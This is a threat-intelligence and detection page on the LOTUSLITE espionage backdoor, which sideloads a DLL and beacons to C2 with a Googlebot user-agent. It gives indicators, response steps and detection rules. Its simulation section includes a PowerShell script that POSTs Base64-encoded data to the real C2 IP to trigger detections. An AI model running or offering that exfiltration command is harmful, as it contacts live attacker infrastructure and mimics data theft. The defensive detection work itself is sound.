LOTUSLITE Campaign: Targeted Espionage Driven by Geopolitical Narratives
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Acronis TRU observed a targeted espionage operation aimed at U.S. government organizations that delivered a malicious DLL backdoor, LOTUSLITE, inside a politically themed ZIP archive. A companion loader executable side-loads the DLL, after which the backdoor beacons to a hard-coded C2 endpoint over HTTPS while spoofing a Googlebot user-agent. The operators establish persistence by creating a dedicated ProgramData directory and adding a Run registry entry. Based on overlapping tradecraft, the activity was linked to Mustang Panda.
Investigation
Analysts unpacked the ZIP and identified the loader binary (Maduro to be taken to New York.exe) alongside the weaponized DLL (kugou.dll). The analysis documented the DLL sideloading flow, beaconing behavior, mutex usage, and the exact persistence artifacts created on the host. Infrastructure review attributed communications to a single IP (172.81.60.97) and a spryt.net-hosted domain, reportedly hosted in Phoenix, Arizona. Attribution to Mustang Panda was assessed with moderate confidence due to shared tactics and infrastructure patterns.
Mitigation
Acronis detections relied on SHA-256 hashes for the malicious binaries and highlighted the specific ProgramData persistence folder and Run key location. Network controls should flag outbound HTTPS connections to the identified IP/domain when paired with a Googlebot user-agent string. Reduce persistence by preventing execution of unknown binaries from ProgramData and removing the associated Run registry entry when discovered.
Response
Immediately isolate affected endpoints, capture volatile data, and preserve the malicious binaries for analysis. Remove the created ProgramData folder and delete the corresponding Run registry value to break persistence. Block connectivity to the C2 IP and domain, and update endpoint detections with the provided file hashes and mutex indicator. Finally, conduct an environment-wide hunt for additional hosts exhibiting the same loader and DLL signatures.
Attack Flow
Detections
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
IOCs (SourceIP) to detect: LOTUSLITE: Targeted espionage leveraging geopolitical themes
View
IOCs (DestinationIP) to detect: LOTUSLITE: Targeted espionage leveraging geopolitical themes
View
IOCs (HashSha256) to detect: LOTUSLITE: Targeted espionage leveraging geopolitical themes
View
Detection of LOTUSLITE Backdoor C2 Communication [Windows Network Connection]
View
Targeted Espionage Campaign Using LOTUSLITE Backdoor [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
The attacker has compromised a workstation and installed the LOTUSLITE backdoor. To exfiltrate data while blending in with legitimate web‑crawler traffic, the backdoor issues an HTTP POST to the hard‑coded C2 server172.81.60.97. It explicitly sets theUser‑Agentheader to “Googlebot” to masquerade as a search‑engine crawler, hoping to slip past perimeter defenses that whitelist such agents. The payload contains Base64‑encoded exfiltrated data. -
Regression Test Script:
# LOTUSLITE C2 simulation – powershell $c2 = "http://172.81.60.97/receive" $ua = "Googlebot" $data = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensitive data payload")) $body = @{ "data" = $data } try { Invoke-WebRequest -Uri $c2 -Method POST -Headers @{ "User-Agent" = $ua } -Body ($body | ConvertTo-Json -Compress) -UseBasicParsing Write-Host "C2 request sent successfully." } catch { Write-Error "C2 request failed: $_" } -
Cleanup Commands:
# Remove any temporary files or lingering network connections Remove-Item -Path "$env:TEMPlotuslite_temp*" -ErrorAction SilentlyContinue # (No persistent services were created in this simulation) Write-Host "Cleanup complete."